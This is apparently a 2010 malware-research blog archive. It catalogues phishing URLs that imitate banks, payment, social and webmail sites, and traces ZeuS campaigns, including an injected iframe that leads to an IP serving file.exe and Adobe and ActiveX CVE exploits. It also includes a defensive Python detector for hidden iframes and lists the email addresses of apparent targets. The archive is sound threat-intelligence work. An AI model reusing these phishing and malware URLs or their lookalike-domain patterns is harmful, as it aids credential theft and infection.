MalwareIntelligence is a site dedicated to research on everything related to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.

28.2.10

Phishing database III

Financial & Banking Institutions
TD Canada Trust (http://www.tdcanadatrust.com/)
http://www-tdcanadatrust-com.epage.ru/td-bank-index.html
Citigroup (http://www.citigroup.com)
http://www.alanmetauro.com/home/online.citibank.com/US/JPS/portal/Index.do.htm?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH
CUA - Credit Union Australia (http://www.cua.com.au)
http://www.colconkproducts.com/pub/your-account-is-locked-cua-com-au/
http://173-11-85-81-sfba.hfc.comcastbusiness.net/images/webbanker.cua.com.au/webbanker/CUA/
UniCredit Banca (http://www.unicreditbanca.it)
http://161.58.125.218/uc/index.html
Gruppo Banca Carige (http://www.gruppocarige.it/ws/gruppo/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_carige/index.html
Gruppo Banca Popolare di Bari
http://www.georgiakoreans.com/bbs/data/bpr/index.html
Banca Cesare Ponti (http://www.gruppocarige.it/grp/bponti/html/ita/index.htm)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_cesare_ponti/index.html
Banca del Monte di Lucca (http://www.gruppocarige.it/ws/bmlucca/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_del_monte_di_lucca/index.html
CRS - Cassa di Risparmio di Savona (http://www.gruppocarige.it/ws/carisa/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/cassa_di_risparmio_di_savona/index.html
Cassa di Risparmio di Carrara (http://www.gruppocarige.it/ws/crcarrara/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/cassa_di_risparmio_di_carrara/index.html
Poste Italiane (http://www.poste.it)
http://posteitalianeonlinebpolcarteprestafgfdf.pcriot.com/posteitaliane/bpol/cartepre/formslogin.aspx.php?TYPE=33554433&REALMOID=06-b5208d98-1e41-108b-b247-8392a717ff3e&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME
http://www.ynzal.com/catalog/images/bpol/bancoposta/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid
http://www.yelin.ru/wm/bancopostaonline.poste.it/bpol/CARTEPRE/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid
Santander (www.santander.com)
http://slarrauri.com/tusitioweb/demo/BentoBox/modules/Logon.html
ABSA (http://www.absa.co.za)
http://markostoreltd.com/account.log/index.php
HSBC (http://www.hsbc.com)
http://worldviba.org/hboard3/bbs/indexx/hsbc/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://www.ss4net.com/flash/IBlogin.html
http://www.tricitypt.com/photos/pediatrics/hsbcsecure/IBlogin.html
http://in2pool.com/Sources/.x/IBlogin.html
http://erethizon.net/pomocne/hibernace/IBlogin.php
http://cs.kku.ac.kr/data/file/alumnus/hsbconline/HSBC/index.php
http://etechsol.pk/cp/IBlogin.html
http://www.fsk-squad.eu/stats/IBlogin.html
http://www.goldenstwarriors.com/boxes/IBlogin.html
http://singaporeluggagestorage.info/modules/foles/kmg/www.hsbc.co.uk/CAM10-jsessionid=000026MQ7KnXUxsKmiYKszFUkGJ12c58ti63.htm

On the domain singaporeluggagestorage.info several phishing packages were uploaded through a web shell. Besides the HSBC phishing pack, others targeting CIBS and ING Direct were found.

ING Direct (http://www.ing.com)
http://singaporeluggagestorage.info/modules/foles/mijn.ing.htm
Lloyds TSB (http://www.lloydstsb.com)
http://cjuckett.com/gallery/include/login/online.lloydstsb.co.uk/online.lloydstsb.co.uk/online.lloydstsb.co.uk/online.lloydstsb.co.uk/customer.ibc/
Wachovia (http://www.wachovia.com)
http://202.111.173.205/.../wachovia/AuthService.php?action=presentLogin&url=https://onlineservices.wachovia.com/NASApp/NavApp/Titanium?action=returnHome
Bank of America (http://www.bankofamerica.com)
http://210.116.103.118/~kardex/gnuboard4/bbs/Languages/
http://ahuarqalliance.com/~ahuarqal/Pringles/www.bankofamerica.com/bofa-update/bofa-update/bofa/
J.P.Morgan (http://www.jpmorgan.com)
http://martindlk.ie/pdf_files/10/c/ch.htm?customerid=&co_partnerId=2&siteid=0&ru=&PageName=login_run&pp=pass&pageType=708XeMWZllWXS3AlBX+VShqAhQRfhgTDrf&co_partnerId=2&siteid=0&ru=&pp=&pageType=708&MfcISAPICommand=ConfirmRegistration&708XeMWZllWXS3AlBXVShqAhQRfhgTDrfQRfhgTDrfA
egg (http://www.egg.com)
http://www.extv.co.kr/data/file/s_tag08/819,00.html
http://www.wrpt.us/fireworks/Egg-Login.htm
InterSwitch (http://www.interswitchng.com)
http://2009_securityupdate1.t35.com/Nigeria_interSwitch.htm
MoneyGram (http://www.moneygram.com)
http://121.11.253.235/.cgi-bin/mg/MoneyGram/eMoneyTransfer/
Discover (http://www.discovercard.com)
https://www.discovercard.com/cardmembersvcs/loginlogout/app/ac_main
VISA (http://www.visa.com)
http://intersecure.fr/security/verified/cards/unlock/ssl/Deutschland/

Electronic Commerce
Amazon (http://www.amazon.com)
http://digiplan.nl/img/xzf5465x6z4f56xz4fx5z64f5645z4x5z64f556xf4z56x4z5f45z6x4f56f4z5xf45zx64f/cxz4564z56z4z6c54cx54xc545c46z54c4zxzxfx5fz4z65f454xz5f45zx45xz64f/
PayPal (https://www.paypal.com)
http://www.revenueirish.net/~gustavo/mongis/webscrcmd=_login-submit&dispatch=5885d80a13c0db1fc53a056acd1538879f614231735d88db02692aa5ce177197.php
http://8shagyasser.com/.cc/pp/us/
http://www.revenueirish.net/~gustavo/mongis/index4.php
http://allmedwholesale.com/cache/paypal/index.htm
http://www.skizo123.com/update/
http://francomm.org/worldsecure/
http://carinethomas10.net/www.PayPal.Com22/webscrcmd=_login-done&login_access=1190737782.htm
Capitalone (http://www.capitalone.com)
http://allmedwholesale.com/cache/c/e/capitalOne/login.aspx.htm

Government Services
IRS - Internal Revenue Service (www.irs.gov)
http://www.budgetcirkus.dk/irs.gov/IRS/irs-refund-account.html
http://195.140.132.196/~dan10417/irs.gov/IRS/irs-refund-account.html
HMRC - HM Revenue & Customs (http://www.hmrc.gov.uk)
http://www.hmrc.ukonlinerefund.com/refund.php?item=1928381240348811

Online Games
World of Warcraft (http://www.worldofwarcraft.com)
http://www.worldofwarcraft-account-instrcationcheck.com/login.asp?app=wam&ref=https://www.worldofwarcraft.com/account/&eor=0&app=bam
http://www.review-billing-worldofwarcraft.com/
http://nm-jk-gh.worldofwarcraftftc.com/
http://check.worldofwarcraftfts.com/
http://account.worldofwarcraftfta.com/

Zynga Poker (http://www.zynga.com)
http://admin_zynga_security.t35.com/
http://administrator-poker.t35.com/security/account_verification/

Social Networking
Hi5 (http://www.hi5.com)
http://aipoise.t35.com/frienddisplayHomePage.do.html
MySpace (http://www.myspace.com)
http://210.51.184.12/myspace.com&session_timed_out.php
Orkut (http://www.orkut.com)
http://orkutfunky2008.50webs.com/index.HTML
http://orkutf.50webs.com/Orkut/
http://lanhousemv.t35.com/
http://abhijaan.justfree.com/2009.html
http://guuhrox.galeon.com/
Facebook (http://www.facebook.com)
http://admin_tools_zynga.t35.com/
http://admin_zynga.t35.com/
http://admin_zynga_poker.t35.com/
http://admin_zyngapokergames.t35.com/
http://adminbanned.t35.com/Zinga.Terms/
http://adminfacebookz.t35.com/Facebook.htm
http://adminforu.t35.com/facebook/facebook.php
http://ak-sdk-fbsdk-conf.t35.com/
http://funnymoneygame.t35.com/
http://facebooknewlog.t35.com/Facebook.php
http://apps-facebook-poker.t35.com/
http://newfoundsite.t35.com/facebook/Facebook.htm
Xbox Live (http://www.xbox.com)
http://anythingmicrosoft.t35.com/

WebMail
Yahoo (http://www.yahoo.com)
https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do?d=U2FsdGVkX19cY56F3r1QvfGtU0XVsveCoTYWNnRpvZ4bILechNLfZTHvHIOFjqsAa77VmsuwGDHOvNJSa0FuwZgPFc6s8evu39eeQ.zeRGM1OZ4zVBg-&m=0&l=en_US&=
Windows Live (http://login.live.com)
http://account_validation.t35.com/Windows%20live.php
http://alw7dany.tripod.com/hotmail.htm
http://wiwaxiaa.tripod.com/
http://girl.q8sex.tripod.com/hotmail/login.srf.htm
AOL Mail (http://www.webmail.aol.com)
http://aolz.t35.com/Webmail/
http://aoltosbillingcenter.t35.com/
http://aolsn.t35.com/
AIM Express (http://www.aim.com/aimexpress.adp)
http://aoldashboard02.t35.com/aimexpress.html

File Hosting
Rapidshare (http://rapidshare.com)
http://2993amit.justfree.com/Rapidshare/files.php
http://www.rapidfree.za.pl/#200
http://easy.justfree.com/index1.php
http://willgax.justfree.com/rp/indir.php
http://babalar2.justfree.com/rp/indir.php
http://rsmany.t35.com/premiumzone.php
http://rapid24.blackapplehost.com/files.php
http://rapid24.blackapplehost.com/logon.php
http://www.phish.yoyo.pl/index.php
http://hotfilm.xaa.pl/rs/index.php
http://chronoshon.t35.com/files.php
Hotfile (http://www.hotfile.com)
http://hotfiles.justfree.com/?f=295/dl/4629684/01bd28f/Boob-E_CD1_chunk_1.rar.html
http://zsah.justfree.com/hotfile/index.php
http://indigo2.justfree.com/

Related information
Phishing database II
Phishing database I
ZeuS on IRS Scam remains actively exploited
New ZeuS phishing campaign against Google and Blogger
Facebook & VISA phishing campaign proposed by ZeuS
Dissection of a fraudulent package. Wachovia phishing attack

Jorge Mieres


23.2.10

New ZeuS phishing campaign against Google and Blogger

A new ZeuS phishing strategy is active. We previously mentioned the trusted entities used as cover in the ZeuS infection and fraud plan: the IRS, VISA and Facebook.

The campaign now focuses on using the names of Google and Blogger. Some of the domains used are:

http://www.google.com/update/VE.php?service=blogger

http://www.google.com/update/VE.php --> annieliu@hotpop.com
http://www.google.com/update/VE.php --> rob@boringbutgood.com
http://www.google.com/update/VE.php --> uin@vangenechten.com
http://www.google.com/update/VE.php --> julian@beweb.com
http://www.google.com/update/VE.php --> lwfcsk@khainata.com
http://www.google.com/update/VE.php --> jorgec@interlinkpr.com
http://www.google.com/update/VE.php --> hquisbert@arcobol.com

http://www.google.com.zobv.kr/update/VE.php
http://www.google.com.desr.kr
http://www.google.com.desr.or.kr
http://www.google.com.erdcq.kr
http://www.google.com.erdcd.kr
http://www.google.com.erdca.co.kr
http://www.google.com.dese.ne.kr
http://www.google.com.desv.co.kr
http://www.google.com.erdcu.co.kr
http://www.google.com.esuk.ne.kr
http://www.google.com.esus.co.kr
http://www.google.com.erdce.kr

http://www.blogger.com.desv.kr/update/VE.php --> gogo@beweb.com
http://www.blogger.com/update/VE.php
http://www.blogger.com/update/VE.php --> rob@boringbutgood.com
http://www.blogger.com/update/VE.php --> teasider@phreaker.net
http://www.blogger.com/update/VE.php --> ede@interlinkpr.com
http://www.blogger.com/update/VE.php --> r.thijs@rubber-resources.com
http://www.blogger.com/update/VE.php --> a.hendriks@rubber-resources.com
http://www.blogger.com/update/VE.php --> murdockrainwave1997@rubber-resources.com

http://www.blogger.com.esut.ne.kr
http://www.blogger.com.esus.ne.kr
http://www.blogger.com.erdcu.ne.kr
http://www.blogger.com.esuk.ne.kr
http://www.blogger.com.erdcu.or.kr
http://www.blogger.com.zobq.or.kr
http://www.blogger.com.desx.or.kr
http://www.blogger.com.erdca.co.kr
http://www.blogger.com.zobq.co.kr
http://www.blogger.com.esuk.kr

Phishing campaigns following a naming scheme like this one (and the earlier ones) show that the reach the ZeuS creators intend is quite broad, and in the coming days there will certainly be other campaigns similar to this fraud.

Related information
Facebook & VISA phishing campaign proposed by ZeuS
ZeuS on IRS Scam remains actively exploited
Zeus and the theft of sensitive information
Leveraging ZeuS to send spam through social networks
ZeuS Botnet and its zombie recruitment power
ZeuS, spam and SSL certificates
Effectiveness of antivirus products against ZeuS
Special!!! ZeuS Botnet for Dummies
Botnet. Hardening in the new version of ZeuS
Fusion. A concept adopted by today's crimeware
ZeuS Carding World Template. (...) the face of the botnet
Financial institutions targeted by the botnet Zeus. Part two
Financial institutions targeted by the botnet Zeus. Part one
LuckySploit, the right hand of ZeuS
Botnet Zeus. Mass propagation of its Trojan. Part two
Botnet Zeus. Mass propagation of its Trojan. Part one

Jorge Mieres


20.2.10

Facebook & VISA phishing campaign proposed by ZeuS

Updated 21.02.2010
More active domains belonging to the same phishing campaign against VISA users. The domains are:

reports.cforms.visa.com.desz.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.desz.ne.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.desz.or.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.ersm.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.edase.or.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.ersm.ne.kr/secureapps/

Original 20.02.2010
ZeuS has a fairly large repertoire of scam strategies for spreading its trojan, as well as phishing attacks against banks and many well-known companies.

We recently warned of a scam campaign using the IRS as cover, which has been running for a long time and is reactivated every so often, forming a cycle intended to spread ZeuS and that holds for all of its strategies.

Now a phishing campaign involving Facebook is active once again.

The domains involved are:

http://www.facebook.com.edase.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersm.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasn.ne.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.desz.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.desz.ne.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersq.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edase.co.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasq.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersw.co.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersa.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasn.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasa.ne.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersm.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasq.ne.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasn.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersa.or.kr/usersdirectory/LoginFacebook.php

As in other campaigns, an iframe tag is injected into the page's source code, which in this case redirects to hxxp://109.95.114.251/us01d/in.php.

This page (in.php) redirects to:

http://109.95.114.251/us01d/load.php
http://109.95.114.251/us01d/file.exe
http://109.95.114.251/us01d/xd/pdf.pdf
http://109.95.114.251/us01d/xd/sNode.php

From there it attempts to exploit several vulnerabilities: CVE-2007-5659, CVE-2008-2992, CVE-2008-0015 and CVE-2009-0927. The first, second and fourth are Adobe Reader JavaScript API bugs (Collab.collectEmailInfo, util.printf and Collab.getIcon), consistent with the pdf.pdf served from the same directory; CVE-2008-0015 is the stack overflow in the Microsoft Video ActiveX control.
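The injected redirector described above is the kind of thing a page capture should be checked for automatically. The following is an added example, not code from the campaign or from this site: it parses a captured HTML page and flags every iframe that is hidden, that loads from a host other than the page's own, or that points at a raw IP address. SAMPLE_HTML is a constructed stand-in for the fake Facebook login page; the only detail taken from the post is the iframe target 109.95.114.251/us01d/in.php.

```python
"""Flag injected iframes in a captured phishing page.

Added example for this page, not the campaign's code. SAMPLE_HTML is a
constructed stand-in for the fake Facebook login page; the only thing taken
from the post is the iframe target 109.95.114.251/us01d/in.php.
"""
from __future__ import annotations
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: list[dict[str, str]] = []

    def handle_starttag(self, tag: str, attrs: list[tuple[str, str | None]]) -> None:
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(attrs: dict[str, str], name: str) -> int | None:
    digits = re.sub(r"[^0-9]", "", attrs.get(name, ""))
    return int(digits) if digits else None


def _is_hidden(attrs: dict[str, str]) -> bool:
    """Zero/one pixel frames or CSS that hides the frame from the victim."""
    style = attrs.get("style", "").replace(" ", "").lower()
    w, h = _dimension(attrs, "width"), _dimension(attrs, "height")
    tiny = w is not None and h is not None and w <= 1 and h <= 1
    return tiny or "display:none" in style or "visibility:hidden" in style


def suspicious_iframes(html: str, page_host: str) -> list[dict[str, str]]:
    """Return iframes that are hidden, point to another host, or use a raw IP."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for frame in parser.iframes:
        src = frame.get("src", "")
        # A relative src stays on the page's own host.
        host = (urlsplit(src).hostname or page_host).lower()
        reasons = []
        if host != page_host.lower():
            reasons.append("off-site:" + host)
        if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
            reasons.append("raw-ip")
        if _is_hidden(frame):
            reasons.append("hidden")
        if reasons:
            hits.append({"src": src, "reasons": ",".join(reasons)})
    return hits


# Constructed sample: a lookalike login form with the injected redirector.
SAMPLE_HTML = """<html><body>
<form action="LoginFacebook.php" method="post"><input name="email"><input name="pass"></form>
<iframe src="http://109.95.114.251/us01d/in.php" width="1" height="1" style="visibility: hidden"></iframe>
<iframe src="/usersdirectory/help.html" width="300" height="200"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE_HTML, "www.facebook.com.edase.or.kr"):
        print(hit["src"], hit["reasons"])
```

The visible help frame on the same host is left alone; only the one-pixel, off-site, IP-addressed frame is reported, which is exactly the shape of the injection the post describes.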

This server is also currently serving another mass campaign, spreading the ZeuS trojan through an IRS scam. In that case only the folder housing the package changes, namely: hxxp://109.95.114.251/usa50/in.php

As we can see, ZeuS does not pause its criminal career. In fact, other campaigns are also active, such as a phishing attack hiding behind the VISA logo.

In this case, other domains used are:

http://reports.cforms.visa.com.edasa.or.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersq.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edase.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersq.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasq.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersm.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersw.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersa.or.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasn.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasa.ne.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersm.or.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasq.ne.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edase.ne.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasq.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasa.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasa.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edase.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasn.or.kr/secureapps/vdir/cholderform.php

Related information
ZeuS on IRS Scam remains actively exploited
Zeus and the theft of sensitive information
Leveraging ZeuS to send spam through social networks
ZeuS Botnet and its zombie recruitment power
ZeuS, spam and SSL certificates
Effectiveness of antivirus products against ZeuS
Special!!! ZeuS Botnet for Dummies
Botnet. Hardening in the new version of ZeuS
Fusion. A concept adopted by today's crimeware
ZeuS Carding World Template. (...) the face of the botnet
Financial institutions targeted by the botnet Zeus. Part two
Financial institutions targeted by the botnet Zeus. Part one
LuckySploit, the right hand of ZeuS
Botnet Zeus. Mass propagation of its Trojan. Part two
Botnet Zeus. Mass propagation of its Trojan. Part one

Jorge Mieres


19.2.10

SpyEye Bot (Part two). Conversations with the creator of crimeware

In recent weeks SpyEye (a new financial trojan) has been widely talked about, because of the positive reception it had in the underground scene thanks to its cost/benefit balance, and because of the impact of a feature in its latest version that lets it remove its competitor, ZeuS, from infected systems.

Our previous report, “SpyEye. Analysis of a new crimeware alternative scenario,” addressed known technical issues involving the activities of this threat.

In this second part we present the exclusive interview conducted by Ben Koehl, Crimeware Researcher at Malware Intelligence. Through conversations with the crimeware's creator, we reveal information that shows some of the thought process and the mind behind SpyEye. We also look at the source code of the Zeus Killer add-on.

The way that Gribodemon thinks is not unique anymore in the cybercrime world. We are seeing individuals and groups becoming more specialized in the services they provide and are no longer spreading themselves thin. There are many industries within the cybercrime world. From coding to infrastructure support to public relations.

There was a large language barrier between me and the author, so I had to keep the questions short and basic so his translator program could handle them (Lingvo). We broke up the conversation in pieces to make it flow better for the reader.

This document can be downloaded from:

English version
Spanish version

Related information
SpyEye Bot. New bot on the market
Annual Information Compendium. Crimeware during 2009


Jorge Mieres


16.2.10

Phishing database II

HSBC
http://www.silverstoneincense.com.au/IBlogin.html
http://www.buyitdirect.co.nz/images/indexx/hsbc/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://delthelboi.net/COsutmer/COsutmer/hsbc/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://woorizip1004.net/zboard/icon/IBlogin.html
http://www.ceipmiraflores.com/inc/ceip/IBlogin.html
http://www.lbirelandftp.com/e-card/IBlogin.html
http://www.galilee.cc/zeroboard/data/rr/CAM10.php?idv_cmd=idv.Logoff&nextPage=IDV_CAM10_AUTHENTICATION=2178611a6f5b6d7d722eacaa9c0a1f52LogonBy=Connect2178611a6f5b6d7d722eacaa9c0a1f52
http://www.officeresourcegroup.com/_analog/hsbc.co.uk/IBlogin.html
http://host24-128-static.39-79-b.business.telecomitalia.it/.personal/www.HSBC.Co.Uk/1/2/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://www.officeresourcegroup.com/_analog/hsbc.co.uk/1/2/IBlogin.html
http://www.sinhvienqb.com/gallery/images/admin/IBlogin.html
http://egg-inter.com/upload/www.hsbc.co.uk/1/IBlogin.html


Citi
http://www.naturalcurves.com//wp-content/themes/blueberry-boat/online-citi-cards/citi%20card/citi%20card/update.html


CajaMadrid
http://oi-cajamadrid.com.es/CajaMadrid/oi/pt_oi/Login/


Orange
 http://92.243.8.56/Orange/info-online-verification.php
http://adminpanel.net/xcart/images/cartpictures/http-id.orange.fr-auth_user-bin-authNuser.cgidate=1266009664=skey=3a347076d2326ec771ebe84a8de131fc=service=communiquer=url=http:webmail1eb.orange.fr*webmail*fr_FR/


Visa
 http://alerts.cforms.visa.com.rep021.kr/secureapps/vdir/cholderform.php
http://92.243.8.56/VerifiedByVisa/visa/error_info.php?cmd=_login-run&dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0ef1b64e562942814a64d80bf24862819bf1b64e562942814a64d80bf24862819b?cmd=_login-run&dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0ef1b64e562942814a64d80bf24862819bf1b64e562942814a64d80bf24862819b


MasterCard
http://www.roxanalatorre.com/panel/mastercard/

Kijiji
http://kijiji-ca.wz.cz/cSignInrups-ConfirmAccount-ruq-re-direct&Dwws.html

PayPal
http://74.86.158.3/~bigbigca/uc/Activation/paypal/
http://french-kiss.org/~o103594/paypal.com/wwwpaypalcompaypalloginukusupdateinfo/webscr.php?cmd=_login-run&dispatch=2e310e6fd3c468fe3657669af990d4912e310e6fd3c468fe3657669af990d491
http://exorh.com/~o103594/paypal.com/wwwpaypalcompaypalloginukusupdateinfo/webscr.php?cmd=_login-run&dispatch=2e310e6fd3c468fe3657669af990d4912e310e6fd3c468fe3657669af990d491
http://calvarychapelabuja.com/users/barbara/account/?cmd=_login-run
http://adcomphelp.com/tutorials/cam/paypal.com/fr/cmd=_registration-run/webscr.php?cmd=_login-run&dispatch=9cf470a1ba43eb481569e296a16bd15d9cf470a1ba43eb481569e296a16bd15d
http://aempresarial.com/admin/www.PayPal.Com22/webscrcmd=_login-done&login_access=1190737782.htm
http://paypol.tk/fr/
http://is250.internetdsl.tpnet.pl/FRS/
http://office.supportacct.operaunite.com/webserver/content/?cmd=_login-run&session-redirect=noCookie
http://www.yoville.justfree.com/
http://www.anassoft.net/webscr.php
http://paypal-ag.de/see/
http://www.coinentertainment.com/images/www.paypal.com/management/financial/login.html
http://paypal-uk.webcindario.com/

eBay
http://rahasiabisnis21.com/_space/apache_module.php?customerid=hemi2u2@yahoo.com&co_partnerId=2&siteid=0&ru=&PageName=login_run&pp=pass&pageType=signin.ebay.com.ws.eBayISAPI.dll.fxHVPoQCOORAlDQoKlPMCP
http://webproxy.go2myspace.com/sell.ebay.ie/ws/eBayISAPI.dll?SellItem
http://www.vietwebdisk.com/signin.ebay.com/ws/eBayISAPI.dll?SignIn&ru=www.ebay.com
http://cosmo.genusis.com/images/icons/eee/login.html#ws/eBayISAPI.dll?SignIn&ru=http://www.ebay.com/
http://sangelecaiolor.czechian.net/polaris-rzr-W0QQitemZ250328176800QQcmdZViewItemQQptZ-logan-hash0item3a48b8d8a00_trksidsp32860c0023/z.php
http://personal-pontoon-ebay.xf.cz/2006%20Lowe%20SUNCRUISER%20BIMINI/ebaymotorsW0QQitemZ180405328696QQcmdZViewItemQQptZboat_pontoonhash=item2a00fedb38&_trksid=p4/index.php
http://www.normans.dk/catalog/images/AllinformationfromWHOISserviceisprovided.html

MegaUpload
http://www.nakudashi.blors.com/Akina/?active.to=http://www.megaupload.com/?c=login&next=d%3DPV1ZQAIJ
http://www.sweetlife.iamspace.com/jav/asia.htm
http://www.karina.blors.com/Sasaki/Studio.htm?to.url=http://www.megaupload.com/?d=RZXZ8YZ5
http://www.nakudashi.blors.com/Akina/
http://www.cocomisakura.blors.com/Sakura/cool.htm?url.active=http://www.megaupload.com/?d=HWDZS4OM
http://www.shokoakiya.blors.com/Akiyama/asiacool.htm?url.active=http://www.megaupload.com/?d=5Y6402AH
http://www.ramunagasuki.blors.com/asia/

Rapidshare

http://raapidshare.ugu.pl/premiumzone.php
http://rapidshare-premium2011.tk/
http://rs786.t35.com/logon.php
http://rapidshare-premium2011.tk/

Facebook
http://www.rep021.kr/usersdirectory/LoginFacebook.php

YouTube
http://youtube-view-all.tk/


Poste italiane
http://gerfdsafsd.pochta.ru/posste.html
http://vaguematch.com/ioncube/_/https/www.poste.it/bancoposta/online/_private/bpol/CARTEPRE/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=
http://www.postevita.it/postevitaTFR.fcc?TYPE=33554433&REALMOID=06-bed2d688-fca1-10a2-bc8e-8392a717ff3e&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=$SM$ZEj9fNrjJTQ1UbgR9hbQoqbSyCYN9lBONkWfqG8%2fz9C7F9%2bG8tRBmA%3d%3d&TARGET=$SM$http%3a%2f%2fwww.postevita.it%3a85%2fgestionetfr%2findex.shtml

CartaSi
http://aviso-utente.rbcmail.ru/utente-cartaSI.html

ABSA
http://www.technicalconsultants.gr/images/oziogallery2/ib.html

HaliFax
http://www.lechateauedizioni.it//components/com_performs/halifax_mail_form/index.php

Regions
http://www.lbirelandftp.com/content/Regions/Regions/

CUA (Credit Union Australia)
http://www.cua-web-banker.com/098237409823749802378905/

Walmart
http://75.32.55.145/walmart/actpatriot/walmart/details.html

Telcel
http://itelcel.byethost13.com/home_telcel/?_ideastelcel2010&_servlet_Controller_EVENT=RECARGA_PROMOCION&rnd=0.15117657
http://www.rosalux.org.mx/logs/cgi_bin-ssl/com_notes/register2.html


Windows Live Hotmail
http://www.windowslivemail.tk/
http://so7ba7elwa.ibda3.org/
http://itelcel.byethost13.com/msn.html
https://www.windowslive.co.uk/hotmailstories/

In this case the same server hosts another phishing page, this one targeting the company Telcel, and all the stolen information is stored there: the credit card data (for Telcel) and the login credentials for Microsoft's webmail. It also serves a download of a fake Windows Messenger 2010, which is malware. Below is a screenshot of the stored credentials.


Bank of America
http://i37.tinypic.com/1zo957a.jpg
http://i35.tinypic.com/20tp4t0.jpg


BBVA
http://87.225.254.21/vendors/shells/templates/verificacion/index.html


World of Warcraft
http://www.blizzard-account-review-blizzard.com/
http://us.bettls.net/login/login.htm?ref=https://www.worldofwarcraft.com/account/&app=wam

Tibia
http://clanprem.atspace.com/
http://clanbrazukas.atspace.com/
http://clandemonsforlite.atspace.com/
http://clanakimichi-join.atspace.com/

Banco do Brasil
http://www.ricklegrandphotography.com/own/index.htm?portalbb

Related Information

Jorge Mieres


13.2.10

Social Engineering exploiting Olympics Games 2010

As usual, social engineering techniques are a fundamental pattern in attacks of every kind and scale.

From this perspective, any news item that within minutes is covered by the most important media worldwide, or any event known to people all over the world, becomes a target whose image can be exploited fraudulently with the intention of spreading malware.

The 2010 Olympic Games, held in the Canadian city of Vancouver, are one of those events for which security professionals sharpen their senses, because they know perfectly well that some campaign will use the event as an excuse to spread.

Under this premise, the early signs have begun to appear. Here is a website created exclusively to spread malware, whose appearance is very similar to the real page of the 2010 Olympic Games.

Here we can see screenshots of the real and the fake page respectively; note that, in addition to the visual social engineering strategy employed, an important part of the deception lies in the domain name, namely:

Real Website - http://www.vancouver2010.com
Fake Website - http://vaucouver2010.com
